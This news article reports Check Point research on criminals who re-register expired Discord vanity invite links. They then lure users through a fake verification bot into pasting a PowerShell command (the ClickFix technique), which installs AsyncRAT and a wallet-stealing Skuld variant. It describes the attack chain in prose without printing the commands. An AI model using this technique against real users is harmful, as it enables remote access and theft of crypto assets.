Check Point: Expired Discord Invites Used to Drain Crypto Wallets of 1,300 Users
1,300 unsuspecting gamers have already fallen for this trap.
Cybercriminals have discovered a new method to weaponize old Discord invite links: a scheme that turns expired vanity invites into malicious traps. Researchers at Check Point uncovered this vulnerability in June 2025, revealing a global threat stemming from Discord’s invite system design.
The Attack Explained
The core of the attack involves hijacking expired vanity URLs, which are custom invite links available to Discord servers with a Boost Level 3 subscription. Once a server loses premium status or the invite expires, the previously used URL becomes available for re-registration. Attackers quickly claim these now-free URLs and link them to their own malicious servers, which are visually indistinguishable from legitimate communities.
Victims, unaware of the switch, click on old invite links still found on forums, social media, or websites, unknowingly entering attacker-controlled spaces. The infection chain emphasizes stealth, social engineering, and evasion of antivirus detection.
Step-by-Step Exploitation
Once inside the fake Discord server, the user is greeted by a bot named "Safeguard", custom-built for this campaign. The bot prompts the user to verify themselves, mimicking official Discord procedures.
Upon clicking the verification button, the user is redirected to a fake webpage that imitates the Discord interface. The page pretends that a Google CAPTCHA has failed to load and instructs the user to enter verification commands manually. This is where the attack begins: clicking the button silently copies a malicious PowerShell command into the clipboard.
Next, the user is told to press Win+R, paste the command, and hit Enter. No files are downloaded, reducing suspicion and bypassing most antivirus software. The command decodes a Base64 string, which fetches and executes a multi-stage malware script hosted on Pastebin.
Malware Delivered
The downloaded payload includes:
- AsyncRAT (remote access trojan)
- A custom version of Skuld Stealer, designed to target crypto wallets and digital asset credentials
All malicious operations, including data exfiltration, are conducted via legitimate cloud platforms such as GitHub, Bitbucket, Pastebin, and even Discord itself. This blending into normal traffic makes the malware harder to detect.
Global Impact
According to Check Point, at least 1,300 users from the USA, Vietnam, France, Germany, and the UK have been affected. The attackers are financially motivated, targeting crypto holders and digital asset owners.
Psychological Engineering: ClickFix
The attack technique, dubbed ClickFix, showcases a highly refined level of psychological manipulation. The malicious code requires no downloads, appears as a routine step-by-step guide, and exploits user trust in Discord's interface and typical Windows behavior. This quiet, confident, and scalable method makes the campaign especially dangerous and effective.
